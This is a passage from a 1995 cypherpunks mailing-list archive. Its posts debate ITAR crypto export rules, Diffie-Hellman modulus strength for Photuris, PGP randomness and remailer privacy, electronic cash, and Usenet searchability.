I set up an anonymous FTP site to recieve PGP from abroad. It arrives 
and I hand it over to Fred who has agreed to distribute any material.


It seems to me that in Hypothetical B I am certainly acting in a manner 
which a US court might consider to be something the US government might
seek to prevent. Effectively I would be trafficing. The fact that I only 
hand the goods over to non-US citizens would appear to be irrelevant.

Defining the precise distinction between what is covered and what is 
not is difficult. It is easier to draw the boundaries broadly and let 
the courts decide what is clearly outside the scope. it is not 
necessarily in the governments interests to have sharply defined lines


		Phill






From sjb at universe.digex.net  Tue Nov  7 13:42:03 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Wed, 8 Nov 1995 05:42:03 +0800
Subject: So much for free speech...[noise?]
In-Reply-To: <9511061846.AA21160@hplyot.obspm.fr>
Message-ID: <199511072047.PAA12140@universe.digex.net>


Laurent Demailly writes:
>"Freedom shall stops where starts the one of the others"
>That's what I learned, and what I think it is a "good thing",
>Thus, your freedom of speach shall stops where it starts hurting
>people
>
>[not that I support at all the childish way l^Hamericans sue everybody
>for anything, but I am happy that racists saying are not allowed and
>can be condamned in France.]

As a child, we all knew the maxim, "Sticks and stones can break my
bones, but names will never hurt me."  Why have we forgotten it as
adults?





From froomkin at law.miami.edu  Tue Nov  7 14:19:59 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Wed, 8 Nov 1995 06:19:59 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <9511072043.AA12971@zorch.w3.org>
Message-ID: <Pine.SUN.3.91.951107161844.22821H-100000@viper.law.miami.edu>


On Tue, 7 Nov 1995 hallam at w3.org wrote:

> >> I would admit that a court might do this in an effort to hold the
> >> statute constitutional, but a court might also hold the regulations
> >> unconstitutional because they are overbroad.  Remember, the first
> 
> >Technically, this is holding the regulations ultra vires, not 
> >unconsitutional; the difference matters.
> 
> I thought Peter was arguing that the separation of powers would be
> affected? Surely this would be a constitutional question?

Yes, that's what he said; I don't agree.

> 
> On the strict ultra-vires question and enforcement on non US citizens
> may I sugest two hypotheticals?
> 
> Hyptotheical A:
> 
> I develop a crypoto system in Geneva and pass the source code to my
> co-worker. Neither of us have export certificates.

No problem if neither of you are US persons (citizen/green card holder)
> 
> Hypothetical B:
> 
> I set up an anonymous FTP site to recieve PGP from abroad. It arrives 
> and I hand it over to Fred who has agreed to distribute any material.

No problem if you and fred are non-US persons abroad.  Big problem if 
Fred is in the US...

> 
> 
> It seems to me that in Hypothetical B I am certainly acting in a manner 
> which a US court might consider to be something the US government might
> seek to prevent. Effectively I would be trafficing. The fact that I only 
> hand the goods over to non-US citizens would appear to be irrelevant.

No, even our government doesn't seek to regulate crypto transfers between 
two foreign persons living outside the US!  (It might attempt to get a 
foreign government to do something, but that's different.)



A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From rah at shipwright.com  Tue Nov  7 14:43:23 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 8 Nov 1995 06:43:23 +0800
Subject: (fwd) CIS TALK THIS THURSDAY, Nov 9th 4 p.m. in 518
Message-ID: <v02120d10acc58ab75501@[199.0.65.105]>


Sorry about the forward, but you'll see why in a sec...

Cheers,
Bob

--- begin forwarded text

Date: Tue, 7 Nov 1995 15:22:34 -0500
To: bsdc at ai.mit.edu
Subject: [joanne at theory.lcs.mit.edu: CIS TALK THIS THURSDAY, Nov 9th 4 p.m.
in 518]
Sender: bounce-bsdc at ai.mit.edu
Precedence: bulk


From: joanne at theory.lcs.mit.edu (Joanne Talbot)
Date: Tue, 07 Nov 95 11:57:15 EST
To: theory-seminars at theory.lcs.mit.edu
Reply-To: theory-seminars-request at theory.lcs.mit.edu
Subject: CIS TALK THIS THURSDAY, Nov 9th 4 p.m. in 518

**Seminar of interest!!

CIS Seminar:    Thursday, Nov. 9th
Place:          NE43-518
Refreshments:   4:00 p.m.
Talk:           4:15 p.m.

Title:          Electronic Cash
Author:         Stefan Brands from CWI

Abstract:
        Two approaches for electronic payments prevail; one focusses
on the secure transmission of creditcard numbers and is account-based,
while the other is token-based and tries to mimic the way coins or
cheques are traded. The first approach can be realized using
elementary cryptographic techniques, but offers at best anonymity of
payments against merchants and requires on-line payment verification.
On-line payment verification can be expensive and become the
bottleneck of a large-scale implementation.

The second approach, electronic cash, can offer full anonimity of
payments, but requires fairly complex cryptographic techniques in
order to guarantee security. Pioneering work in this area has been
done by David Chaum. Unfortunately, his techniques are practical only
for on-line electronic payments and hence less appropriate for
large-scale implementation.

In my presentation I will discuss the design of practical electronic
cash systems that have off-line payment ability.

Further information can be found on: http://www.cwi.nl/~brands/

Host: Ronald Rivest
--- end forwarded text


-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From rah at shipwright.com  Tue Nov  7 14:48:30 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 8 Nov 1995 06:48:30 +0800
Subject: Sign my own certificates?
Message-ID: <v02120d0cacc588e1e690@[199.0.65.105]>


>Oh jesus, I need to get myself a certificate for the netscape servers
>at work.
>
>All I need are three forms of identification, two written letters, an
>authorized signature, $300, mailed and faxed, along with an e-mail
>or two.
>
>I think this is an amazing pain in the ass.

You forgot about the sperm sample. I wouldn't necessarily consider that
pain, though...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From lmccarth at cs.umass.edu  Tue Nov  7 15:28:57 1995
From: lmccarth at cs.umass.edu (lmccarth at cs.umass.edu)
Date: Wed, 8 Nov 1995 07:28:57 +0800
Subject: DejaNews all over again
In-Reply-To: <199511062222.RAA14762@yakko.cs.wmich.edu>
Message-ID: <199511072307.SAA10176@thor.cs.umass.edu>


frogfarm at yakko.cs.wmich.edu writes:
[re: http://dejanews.com]
> Having said that, I'm greatly looking forward to the impending addition
> of the alt.* groups to their archives. Everyone is indeed a Kibo now,
> and the general public has become more aware of the need for reputations
> as a result.

They now have some alt.*. They've got my rmgroup of 
alt.wild.sex.with.cute.nonAIDSinfected.interesting.sonsofbitches, which 
suggests they've done a pretty thorough job for some time period.

As others have noted, this has clearly been coming for a long time. 
Pseudonymous accounts like Community Connexion's are a partial solution. But
I expect an expansion of the market for strongly pseudonymous mail aliases,
providing fewer services for cheaper rates. It's not enough just to separate 
your True Name (verinym) from your name on the net. Many will want to use 
tentacles (*), er, separate pseudonyms for discussions in different parts of 
the net. After all, I might not want the c'punks to hear about my past life as
a control freak (pun intended) in alt.config. Just a reminder....

-L. Futplex McCarthy  Remailer Feedback Page: 
                      http://www.cs.umass.edu/~lmccarth/remailers/feedback.html

(*) Speaking of tentacles, Dejanews reveals that my name is on the long list
of people whose signatures have been appropriated by Detweiler ;)





From srao at ISI.EDU  Tue Nov  7 15:41:25 1995
From: srao at ISI.EDU (Santosh Rao)
Date: Wed, 8 Nov 1995 07:41:25 +0800
Subject: idle CPU markets
Message-ID: <199511072315.AA04909@zephyr.isi.edu>


> Date: Fri, 27 Oct 1995 06:25:34 -0700
> To: cypherpunks at toad.com
> From: Jay Campbell <edge at got.net>
> Subject: Re: idle CPU markets
> Sender: owner-cypherpunks at toad.com

> A graphic-arts chum of mine is really hyper about cycle sales - it will
> allow him to produce broadcast-quality commercials on a project-by-project
> basis without a huge initial hardware upgrade investment. Is anyone working
> on a Java libarary/demo/whatnot that allows plug-in algorithms, work
> completion 'fetch next batch' code, and some rudimentary authentication
> scheme? If not, I may tinker with this - if so, I'd like to chat :)


At USC/Information Sciences Institute, we are developing a system that will
enable computer owners to sell or barter processor-cycles on the Internet.
This is in some ways similar to what you talk about, in that it allows
the execution of plug-in applications, and the policies for allocation
and deallocation of remote resources are decided by the owners and are 
transparent to the end user. However, unlike Java, our applications are 
compiled C programs that execute on *compute servers* rather than on
client machines. The application could in turn be an interpreter for 
some other language (e.g. Java). We also support parallel applications 
that use the Parallel Virtual Machine (PVM) libraries for interprocess 
communication. 

We have implemented a prototype known as the Prospero Resource Manager 
(PRM); a parallel version of POVRAY raytracing program is one of the 
applications we've run using PRM. We are currently working on integrating 
PRM with authentication and payment products (including kerberos, netcheque
and netcash) developed as part of our other projects on security and 
electronic commerce. If you are interested in further information about 
any of these products, or are interested in participating in any aspect 
PRM's development we'd be happy to talk to you. More information is also 
available on our web pages: http://nii-server.isi.edu/info/prm and
http://nii-server.isi.edu/gost-group.

We also believe that one of the parallel applications for which PRM is 
useful is showing the weakness of certain encryption methods with limited
key size. If anyone has suggestions for algorithms or software that might
be included as a demo application in the next release of PRM, please contact
me.

Santosh Rao.






From jimbell at pacifier.com  Tue Nov  7 16:07:28 1995
From: jimbell at pacifier.com (jim bell)
Date: Wed, 8 Nov 1995 08:07:28 +0800
Subject: lp ?
Message-ID: <m0tCxAm-000912C@pacifier.com>


>"Peter D. Junger" writes:
>>"Perry E. Metzger" writes:
>>
>>: 
>>: Thaddeus J. Beier writes:
>>: > So, if this person was sending cryptographics codes from Switzerland
>>: > to Israel, the code would have been imported to the US, then exported
>>: > by UUNET.  They can't do that, can they?  Probably nobody would prosecute,
>>: > but it might be something to threaten UUNET with if one of their Northern
>>: > Virginia neighbors ever wanted something the couldn't get otherwise.
>>: 
>>: It isn't clear that telecoms treaties don't implicitly make this legal
>>: in spite of the export regulations.
>>
>>Once again, what the ITAR forbid is the disclosure of cryptographic
>>software to a foreign person within or without the United States, so
>>it does not make any difference whether the message containing the
>>code passes through the United States or not.
>
>OTOH, the ITAR explicitly permits "temporarily imported" munitions to
>be re-exported.  Those clauses should entirely eliminate the issue of
>whether UUNET could be held liable under ITAR.  ITAR says otherwise --
>see section 120.18.

What if all traffic routed through the US was automatically modified, say,
by inverting all bits, and then de-inverted after it exited the country. (a
software flag would alert the systems to this).  At the time it was
exported, it would not be runnable code, nor compilable source code.

Sure, somebody would claim that "it's easy to turn it into runnable code,
just by XORing the file with ones."  The response is obvious:  Every 100K
file is only a XOR away from every OTHER 100K file.






From whitaker at sover.net  Tue Nov  7 16:20:37 1995
From: whitaker at sover.net (Stephen Whitaker)
Date: Wed, 8 Nov 1995 08:20:37 +0800
Subject: toolkits?
Message-ID: <199511072351.SAA03354@maple.sover.net>


Thanks, Daniel, for a thoughtful response.

At 08:18 AM 11/7/95 CST, Daniel R. Oelke wrote:

>First off - avoid trying to legislate minute details of any encryption
>or signature scheme.  Bureaucrats trying to understand, much less control
>technical things is doomed to fail.  (take GOSIP as a prime example)
>

I didn't mean to suggest that government would be responsible to get it right.
It is possible to show them how it's done though.


>Second - push for legal acceptance of digital signatures and
>acceptance of privacy through encryption.  I believe Utah has taken a strong 
>step in this direction.  Most people, businesses, and courts won't accept
>digital contracts and the like until there is more of a sound
>set of laws behind them.  

This is good as it can be pitched as economic development. Any good models?
Where to find the UTAH language? Pitfalls to watch out for?

>Strong laws against government snooping or
>against anti-encryption or anti-anonymous laws are a good thing IMO.

This will probably be tough in the current environment. Again, any good
language available? Fortunately Vermont is small enough where anyone can get
a bill printed and introduced if it is properly drafted.

What did the recent US Supreme court decide in support of anonymity?

>
>Third - provide services to the citizenry.  For example - provide
>a public key server.  Or how about a digital time-stamping service.
>If the crap was kept out of these services, and they were free for
>anyone to use, then it would advance the idea of encouraging people to
>use crypto in their daily lives.
>

Now were getting specific. These are things that us ordinary folk can do
which show the 'leaders' how to follow. What software, hardware,
applications, support and sysadmin experience is required and where is it
available on what terms. What are the cash flow opportunities to support
such services?

>Warning - Although I think there are some good things that governments
>can do, it is also very important to watch out for "sabotage" by 
>the government.  Governments tend to like control too much and by
>trying to maintain control, reverse a useful service to one that
>is a dis-service to the people.  In general, if governments get
>out of the way, people will take care of problems themselves.
>

Agreed. That why after five or six years of trying to get the privacy laws
passed, and watching government drag anchor, I started fishin the
cypherpunks list for some pragmatic solutions to everyday situations.

I'd still like to be pointed to some toolkits/reference works which will
teach me how to access and use available information (or data) to map the
net performance, message paths, transmission delay times, sniffers active, etc.

-sw






From zeus at pinsight.com  Tue Nov  7 16:43:30 1995
From: zeus at pinsight.com (J. Kent Hastings)
Date: Wed, 8 Nov 1995 08:43:30 +0800
Subject: [NOISE] Karl Hess/Schulman Events
Message-ID: <199511080045.QAA27376@chico.pinsight.com>


Visit Neil's page, http://www.pinsight.com/~zeus/jneil/

Here are places he'll be in Southern California this month
to promote his new book. Contact Neil at jneil at genie.com
for more information.

>                     J. NEIL SCHULMAN APPEARANCES
> 
> --------------------------------------------------------------------
>             [Download Neil's Photo]    [Download Cover]
> 
>                    "SELF CONTROL Not Gun Control"
>                            November, 1995
> 
>           NOVEMBER, 1995 APPEARANCES
> 
>         * Friday Nov. 10, opening until close of show
>           Saturday Nov. 11, opening until 4 PM
>           Sunday Nov. 12, opening until close of show
>           Personal appearance / book autographing!
>           Great Western Gun Show
>           At Fairplex in Pomona, CA
>           Building 6, Table 7048 --
>           next to Threat Management Institute / Peter Alan
>           Kasler
> 
>         * Saturday Nov. 18, afternoon
>           Personal appearance / book autographing!
>           Richard Kyle Books
>           242 East 3rd Street
>           Long Beach, CA 90802
>           Further Info: (310) 432-KYLE
> 
>         * Monday, Nov. 20, 7:00 PM dinner, 8:15 PM program
>           Speech: "SELF CONTROL Not Gun Control"
>           Karl Hess Club
>           Marie Callender's Restaurant 4356 Lincoln Blvd.
>           Marina Del Rey, CA $13.00 includes meeting, buffet
>           dinner with soup, salad bar, meatloaf entree & sides,
>           corn bread, choice of three pies & beverage, tax &
>           tip included. Reservations appreciated at (310)
>           289-4126, 24 hours.
>           EMail for further info to agorist003 at aol.com.
> 
> If you would like J. Neil Schulman to make a personal appearance at
> your club meeting or store, Email: jneil at genie.com or Phone/fax:
> 1-500-44-JNEIL (1-500-445-6345). If difficulty connecting, call
> through AT&T 1-800-CALL-ATT then 500-445-6345.
> 
> Return to J. Neil Schulman's Home Page.
> --------------------------------------------------------------------
> HTML by J. Kent Hastings  [Artist]  , zeus at pinsight.com,
> 
> 1354 East Ave. # R-108, Chico, CA 95926. Fax: (916) 893-1525.

Kent
-- 
"Put pages for your business on the World Wide Web, 
just $5 per month!" -- J. Kent Hastings -- 
zeus at pinsight.com -- http://www.pinsight.com/~zeus/








From djw at pdcorp.com  Tue Nov  7 17:18:39 1995
From: djw at pdcorp.com (Dan Weinstein)
Date: Wed, 8 Nov 1995 09:18:39 +0800
Subject: Exporting software doesn't mean exporting
In-Reply-To: <Pine.NXT.3.91.951107144209.255A-100000@oe1>
Message-ID: <199511080054.QAA29419@email.pdcorp.com>


On Tue, 7 Nov 1995 14:52:33 +0100 (GMT+0100), you wrote:

>
>
>On Tue, 7 Nov 1995, Peter D. Junger wrote:
>
>> >From Section 120.17 of the ITAR which provides:
>> 
>>  _Export_ means:
>>  . . . .
>>  (4) Disclosing (including oral or visual disclosure) or transfering
>>  technical data to a foreign person, whether in the United States or
>>  abroad . . . .
>
>The ITAR is U.S.-Law. This only applies (by definition) to US-citizens
>or persons in the U.S.!
>
>I think it's a common mistake of many Americans that they believe
>creating law means creating law for the whole world!

The what U.S. law says and what U.S. officials can enforce are two
different things.  You are in violation of ITAR if you send crypto
software from Mexico to Europe over the INTERNET if it is routed
through the U.S..  Think of it like drugs being shipped through the
U.S., the drug lord that sent it throught is just as guilt under U.S.
law as the mule that is carrying it.  The problem is that ITAR was not
writen to take the current situation into consideration.  It is writen
to deal with physical equipment and concepts that only a small number
of people understand.  Given those perameters ITAR would work, but
given the current climate of readily available crypto software and
wide spread understanding of crypto technologies ITAR cannot do what
it was designed to do.

>
>> Go read the section that I quoted again.  Where is there an exception
>> for foreign persons who happen to be abroad?  
>
>It's inherent. You simply can't apply US-law to non-US-citizens outside
>the U.S.!  

Quite to the contrary, U.S. law applies whereever the U.S. can enforce
it.  Their are  many U.S. laws that the U.S. attempts to enforce
outside the U.S..  One example is that the U.S. law allows the
abduction of those who have murdered U.S. citizens outside the United
States.  This law is in place in an attempt to protect U.S. citizens
from terorism.  If you do not believe me just ask Manuel Noriega
(sp?).


Dan Weinstein
djw at pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche








From karn at qualcomm.com  Tue Nov  7 18:07:19 1995
From: karn at qualcomm.com (Phil Karn)
Date: Wed, 8 Nov 1995 10:07:19 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <1999.bsimpson@morningstar.com>
Message-ID: <199511080143.RAA22564@servo.qualcomm.com>


> Our practical experiences with discrete logs suggests that the effort
> required to perform the discrete log precomputations in (a) is slightly
> more difficult than factoring a composite of the same size in bits.  In
> 1990-91 we estimated that performing (a) for a k-bit prime modulus was
> about as hard as factoring a k+32-bit composite.  [Recent factoring work
> has probably changed this a bit, but it's still a good estimate.]

This is also my understanding, which I got from you in the first
place.  I take it there have been no dramatic breakthroughs in the
last few years in the discrete log problem? How heavily has it been
studied in comparison with factoring?

Yes, in theory once an attacker spends enough time precomputing a
table for a particular modulus he can then attack individual DH key
exchanges with ease. This seems entirely analogous to attacking
RSA. If you spend the time up front to factor my public RSA key, then
you can also easily attack individual messages to me.

So if I am willing to rely on a PGP key of, say, 1024 bits then I
should be equally willing to rely on a 1024-bit DH modulus.

Now there is admittedly a practical difference here -- people *can*
change their PGP RSA keys occasionally, though this is hard to do when
you have a lot of signatures.  And each user has his/her own PGP RSA
key, and cracking that gives you only the traffic to that user.  A
public DH modulus will be shared by many more people -- making it a
much more tempting target.

Still, requiring support of a fixed modulus for shared public use is
important to promote a basic level of interoperability. This has its
risks, but it should be okay *provided* it's a strong prime of
sufficient strength to preclude the precomputation of the discrete log
tables by even a highly motivated and resourceful attacker. And as a
backup the protocol should provide for the optional use of private
moduli between consenting parties. Sound reasonable?

Phil








From karn at qualcomm.com  Tue Nov  7 18:07:27 1995
From: karn at qualcomm.com (Phil Karn)
Date: Wed, 8 Nov 1995 10:07:27 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <1999.bsimpson@morningstar.com>
Message-ID: <199511080146.RAA22568@servo.qualcomm.com>


>Hilarie Orman posted that 512-bits only gives an order of 56-bits
>strength, 1024-bits yeilds 80-bits strength, and 2048 yields 112-bits
>strength.  I do not have the facilities to verify her numbers.

>As most of us agree that 56-bits is not enough (DES), the 512-bit prime
>seems a waste of time and a tempting target.  I'd like to drop it, but
>Phil is inclined to keep it with a disclaimer.

Well, since we already require 56-bit DES in ESP in the interests of
promoting basic interoperability, wouldn't a 512-bit prime be
similarly sufficient?

Again, I'm *not* going to recommend that people use it, only provide it
for those who simply cannot use larger moduli for whatever reason (export
controls or CPU limits).

Phil






From frissell at panix.com  Tue Nov  7 19:04:18 1995
From: frissell at panix.com (Duncan Frissell)
Date: Wed, 8 Nov 1995 11:04:18 +0800
Subject: So much for free speech...
Message-ID: <199511080238.VAA29423@panix.com>


At 08:57 AM 11/6/95 -0800, Timothy C. May wrote:
>Children are usually not accorded full constitutional protections,
>especially not in public schools, but this does not mean the police should
>arrest those who utter the wrong words! (Maybe suspending the student,
>though I certainly wouldn't do that.)

That's the rub.  Kids can be kept locked up even with no crime.  "Children
don't have a right to liberty only a right to custody."  An adult would
probably not get arrested in the same circumstances (cops have more
discretion to push kids around) or if arrested not prosecuted, or if
prosecuted, case dismissed.  

It's a good thing the kid didn't engage in racist/Nazi acts like cutting
government spending and taxes or they would have thrown the book at him.

>This is the "safe and secure" world we are in, where bad thoughts and bad
>words are punished. Or threatened with lawsuits. Anarchy seems infinitely
>preferable to me.

You got that right.

DCF

"Remind me to use an anonymous remailer in the future when indulging in racism."






From frissell at panix.com  Tue Nov  7 19:21:40 1995
From: frissell at panix.com (Duncan Frissell)
Date: Wed, 8 Nov 1995 11:21:40 +0800
Subject: DejaNews all over again--a URL for Usenet Searching
Message-ID: <199511080238.VAA29437@panix.com>


At 12:28 PM 11/6/95 -0800, Timothy C. May wrote:
>
>I usually avoid passing on URLs of interesting sites, in the name of
>conserving bandwidth (*), but this one really has me jazzed:
>
>http://dejanews.com/
>
>It allows searching of Usenet archives (a few months' worth, from what I
>can see).

I'm not impressed since I've been using the subscription version of Infoseek
for a while now which lets you search the last month of News and includes
mailing lists as well (including cypherpunks).  The free version is behind
the Net Search button on Netscape but only searches the Web.

http://www.infoseek.com

A search for tcmay at got.net produced more than 200 hits.  My Tim you *do* get
around.  Modesty prevents me from mentioning any newsgroup names.

DCF






From anonymous-remailer at shell.portal.com  Tue Nov  7 19:28:16 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 8 Nov 1995 11:28:16 +0800
Subject: DejaNews all over again
Message-ID: <199511080306.TAA10540@jobe.shell.portal.com>


On Tue, 7 Nov 1995 lmccarth at cs.umass.edu wrote:

> your True Name (verinym) from your name on the net. 
> Many will want to use 
> tentacles (*), er, separate pseudonyms for discussions in different parts of 
> the net. After all, I might not want the c'punks to hear about my past life
> as a control freak (pun intended) in alt.config. Just a reminder....
> 

> (*) Speaking of tentacles, Dejanews reveals that my name is on the long list
> of people whose signatures have been appropriated by Detweiler ;)

You too, eh??

I wish that Detweiler could (seriously) go back to wherever he came from. 
Hopefully this time, he can make the attempt ... backwards. 

I no longer become incensed at his type of spoofing.  I understand that a
message may look like it appears to come from a site, but it in fact
doesn't.  Who really knows??  

Even a message that is PGP signed isn't guaranteed to be from the person
who apparently signed it.  Someone might have a web server that asks
Netscape Navigator (very politely) to send out someone's secret PGP keyring,
or asks Navigator to monitor a person's keystrokes when they enter their
password, or heaven forbid their electronic daytimer.

Once you have that, it's easy to send a forged PGP SIGNED email.  Even 
worse, most readers of email will tend to believe that an electronic 
signature is prima facie evidence that a message is from who it 
appears to be from.

It just doesn't work that way.  

You have to look at the message and use "fuzzy" logic to determine how
probable it is that a given message is from the person who it represents
itself as coming form.  And sometimes, you'll be wrong.

Just like the good old, "Dr. Frederick B. Cohen", who posted to this list. 

Is he really the Dr. Cohen, noted international computer virus expert, the
very man who coined the term "computer virus", or isn't he?  Is he the man
who the US military approached to verify whether missile guidance systems
could be compromised by a foreign power utilizing a trojan horse or virus,
or not.  Do we believe his web page?? 

Even if we do, do we place a greater degree of trust in his words, than
that of say, yours truly, Alice de 'nonymous, or of someone who claims to 
be Tim May when they BOTH say that there are very serious flaws and 
deficincies in the Netscape Navigator product?  Or do we infer that a 
"no comment" coming from AT&T and Netscape, acts as confirmation that 
the *information* in the post is reliably correct.

It's impossible to say with certainty.

Maybe if someone on this mailing list attended Dr. Cohen's talk today at 
the Hilton Hotel, in Washington, D.C., and fills us in with what he said, 
(if we can trust _that_ poster) and we independently verify for ourselves
whether what _he_ (Dr. Cohen or Mr. Confirmation) is saying *seems* to be
reasonable, then we _might_ be able to say that we _may_ be reasonably
certain, that we DO have an international celebrity amongst us and posting
to this list, and notifying the world of a serious problem.

I mean what would you expect, a Press Release??



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From stewarts at ix.netcom.com  Tue Nov  7 21:07:01 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Wed, 8 Nov 1995 13:07:01 +0800
Subject: using pgp to make an otp
Message-ID: <199511080454.UAA08618@ix.ix.netcom.com>


At 11:31 PM 11/6/95 EST, Derek Atkins <warlord at MIT.EDU> wrote:
>> 	PGP output is not random enough to be used for a one time pad.
>> The security of a OTP is *entirely* based on the quality of the random
>> numbers; they should come from some strong generator.  Building good
>> one time pads is tough, and usually not worth the effort.
>
>No, however the output of "pgp +makerandom=XXX filename.dat" _IS_
>random enough for an OTP.  The problem then becomes distributing this
>data.

amp had written:
| my point here is that _if_ pgp output is random enough, i wouldn't need
| hardware. even i, with my extremely limited programming skills could create
| a .cmd file or program that could be used as input for a stream cypher.

The output of PGP should be random enough for your application,
as long as you don't think you're getting a cryptographically-correct OTP
out of the deal.  PGP uses its randpool stuff in its random number generation,
so there are likely to be at least 24 bytes of real randomness kept around, 
maybe more depending on the size of your randpool, but the rest of
your security comes from algorithm quality and is theoretically crackable
like any pseudo-random sequence (albeit requiring exponentially-large
crackwork.)
It's using IDEA in a feedback mode, so it's better than just repeated MD5s.

The output of PGP +makerandom probably is secure enough for most applications,
depending on how many bits you're using, what you're doing with it,
and how paranoid you need to be.  Check out the code to be sure.
You may have special applications such as amp's stream cypher
for which it's more convenient to XOR the makerandom instead of using PGP,
but watch out for attacks like known-plaintext, which can really bite you
in secure-voice systems where there's a lot of near-silence.
Careless protocol work can spoil really decent random numbers....
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From anonymous-remailer at shell.portal.com  Tue Nov  7 21:21:55 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 8 Nov 1995 13:21:55 +0800
Subject: PGP Comment feature weakens remailer securityPGP Comment feature weakens remailer security
Message-ID: <199511080454.UAA05765@jobe.shell.portal.com>


-----BEGIN PGP SIGNED MESSAGE-----

Suppose you want to mail or post something sensitive enough
to chain through several remailers with PGP encryption at every stage
to protect the privacy of communications.  PGP can bite you.
The PGP comment feature lets you stick one (or more?) lines of comment
into your encrypted messages, after the Version: line but before the
encrypted message body.  If you use the PGP comment feature to say something
more or less unique (mine says that you can get PGP outside the country
from ftp.ox.ac.uk), anybody eavesdropping the last remailer in your chain
can notice this in the remailer's input and recognize that it's from you,
even though you've chained through six different places to get there.
It's still encrypted, and protected to the extent that the remailer protects
you, but if the remailer is corrupt or your message can be identified 
by size among the other remailer inputs, you're hosed.

So, for safety, either turn off PGP comments before using it 
with remailers, or wipe out the comments by hand  before each layer of encryption
(easy to do with GUI-based systems like Private Idaho; I don't know
if premail lets you do this or not.)

                                      Bill Stewart

-----BEGIN PGP SIGNATURE-----
Version: 2.7.1
Comment: PGP available outside U.S.A. at ftp.ox.ac.uk

iQBVAwUBMKAgw/thU5e7emAFAQFStwH/QnIiiaeSmUp1YynDBLVo3HAWsVkS0nx8
Fc95Mr0YJ/YIoRDz+xuNgLHbjJZSTUbhOnigMRb7JLNqhmCGvS5RBQ==
=ZWhB
-----END PGP SIGNATURE-----

#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From ktk at anemone.corp.sgi.com  Tue Nov  7 22:01:21 1995
From: ktk at anemone.corp.sgi.com (Katy Kislitzin)
Date: Wed, 8 Nov 1995 14:01:21 +0800
Subject: EARLY WARNING: Decemeber SF Bay Area Cyperpunks
Message-ID: <199511080549.VAA04978@anemone.corp.sgi.com>


Hi--

Eric Messick and I will be holding the Decemeber C'punks meeting at
our geodesic dome in the Santa Cruz Mountains.  It will be a
combination meeting and holiday get-together.  It will be happening on
the usual c'punks saturday, Dec 9, but will start at 4:00 pm instead
of the usual noon.  A more spirited announcement will follow closer to
the date.

--kt





From bglassle at kaiwan.com  Tue Nov  7 23:13:20 1995
From: bglassle at kaiwan.com (Bob Glassley)
Date: Wed, 8 Nov 1995 15:13:20 +0800
Subject: Lotus Notes RSA Implementation Question
Message-ID: <199511080702.XAA22876@kaiwan.kaiwan.com>


-----BEGIN PGP SIGNED MESSAGE-----

I am currently considering using Lotus Notes for a group-ware solution
where security is of great importance.  I have studied Notes
documentation regarding thier implementation of the RSA encryption
library, but it leaves some unanswered questions.

If anyone on the list has knowledge of the following items, I would be
very gratefull.

1)  What is the key size used by the USA licensed version?

2)  Considering RC4 is a proprietary scheme, have there been any
concerted efforts to validate it's strength or lack of?  If so, could
you give a pointer to any documents I could review.

...Bob Glassley

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKBVtW7xvKhVs/sNAQHCowP+LF2stvSPzatDfAkKx2DfU8sH5S7p6KwN
PwDEak9it1Uq0eALHWVTc3VZ3WYY+6XIjYNnNyfdKsgehXb+2dVEgjz1qbHyK+uE
3JhlYOeCfBcXUrTbilAoYXghJHvrpJq8z+Pa6u2W5Wgxks+t9MYzjV3YKLM2Nj6Z
y6jbBUcyyNc=
=TN1O
-----END PGP SIGNATURE-----







From anonymous-remailer at shell.portal.com  Wed Nov  8 01:35:34 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 8 Nov 1995 17:35:34 +0800
Subject: Crypto++, Cpunk Icons, list noise
Message-ID: <199511070727.XAA06592@jobe.shell.portal.com>


On Mon, 6 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote:

>> And as the messenger, I (hope) I don't have anything to fear, from the
>> NSA or any other foreign group that would seek to pursue its own agenda
>> within the borders of sovereign Canada.  I really don't think that the
>> NSA is "evil incarnate", as some list subscribers do.  They have their
>> intelligence and know how to use it.  Usually, they use it prudently.
>
>They have a nice friend (the author of Spyworld would say outpost)
>right here in Ottawa at the Communications Security Establishment.

Yes.  I'm well aware of where I can find an Operations Officer, if I need
to.  Locally, in fact.  Don't really have to go to Ottawa, for that. 

(Wrong guess, btw ...)

>They (CSE) seem to have done some recent spying on the opposition
>parties and Quebec separatists (so I vaguely recall having read in
>several places. 

Yes.  At least in this part of the country, we're relatively ho-hum (big
